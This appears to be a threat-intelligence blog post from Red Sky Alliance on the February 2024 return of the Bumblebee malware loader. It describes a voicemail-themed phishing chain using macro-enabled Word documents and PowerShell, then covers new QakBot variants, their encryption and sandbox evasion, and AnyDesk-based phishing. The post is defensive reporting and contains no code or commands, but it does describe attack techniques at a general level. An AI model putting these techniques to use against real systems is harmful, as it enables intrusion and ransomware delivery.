Don’t get stung by the Bumblebee

12389946898?profile=RESIZE_400xThe infamous malware loader and initial access broker known as Bumblebee has resurfaced after a four-month absence as part of a new phishing campaign observed in February 2024. The enterprise security firm Proofpoint reported that the activity targets organizations in the US with voicemail-themed lures containing links to OneDrive URLs.  "The URLs led to a Word file with names such as "ReleaseEvans#96.docm" (the digits before the file extension varied)," the company said in a recent report.  "The Word document spoofed the consumer electronics company Humane."  Opening the document leverages VBA macros to launch a PowerShell command to download and execute another PowerShell script from a remote server that, in turn, retrieves and runs the Bumblebee loader.[1]


Bumblebee, first reported in March 2022, is mainly designed to download and execute follow-on payloads such as ransomware.  It has been put to use by multiple crimeware threat actors that were previously observed delivering BazaLoader (aka BazarLoader) and IcedID.  It is also suspected to have been developed by threat actors the Conti and TrickBot cybercrime syndicate as a replacement for BazarLoader.  In September 2023, Intel 471 disclosed a Bumblebee distribution campaign that employed Web Distributed Authoring and Versioning (WebDAV) servers to disseminate the loader.

The attack chain is notable for its reliance on macro-enabled documents in the attack chain, especially considering Microsoft began blocking macros in Office files downloaded from the internet by default in July 2022, prompting threat actors to modify and diversify their approaches.  The macro-based attack is also markedly different from pre-hiatus campaigns in which the phishing emails came with zipped LNK files bearing Bumblebee executables or HTML attachments that leveraged HTML smuggling to drop a RAR file, which exploited the WinRAR flaw tracked as CVE-2023-38831 to install the loader.

The return of Bumblebee also coincides with the reappearance of new variants of QakBot, ZLoader, and PikaBot, with samples of QakBot distributed in the form of Microsoft Software Installer (MSI) files.  The. MSI drops a Windows .cab (Cabinet) archive containing a DLL.  The. MSI extracts the DLL from the .cab and executes it using shellcode.  The shellcode causes the DLL to spawn a second copy of itself and inject the bot code into the second instance's memory space.


The latest QakBot artifacts have been found to harden the encryption used to conceal strings and other information, including employing a crypto-malware called DaveCrypter, making it more challenging to analyze.  The new generation also reinstates the ability to detect whether the malware runs inside a virtual machine or sandbox.

Another crucial modification includes encrypting all communications between the malware and the command-and-control (C2) server using AES-256, a more robust method than was used in versions before the dismantling of QakBot's infrastructure in late August 2023.  The takedown of the QakBot botnet infrastructure was a victory. Still, the bot's creators remain free, and someone with access to QakBot's source code has been experimenting with new builds and testing the waters with these latest variants.  One of the most notable changes involves a change to the encryption algorithm the bot uses to conceal default configurations hardcoded into the bot, making it more difficult for analysts to see how the malware operates; the attackers are also restoring previously deprecated features, such as Virtual Machine (VM) awareness, and testing them out in these new versions.

QakBot has also emerged as the second most prevalent malware for January 2024, trailing behind FakeUpdates (aka SocGholish) but ahead of other families like Formbook, Nanocore, AsyncRAT, Remcos RAT, and Agent Tesla.

The development comes as investigators reported a new campaign in which phishing sites mimicking financial institutions like Barclays trick potential targets into downloading legitimate remote desktop software like AnyDesk to resolve non-existent issues purportedly and ultimately allow threat actors to gain control of the machine.


This article is presented at no charge for educational and informational purposes only.

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.  Call for assistance.  For questions, comments, a demo, or assistance, please get in touch with the office directly at 1-844-492-7225 or   




Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings



E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!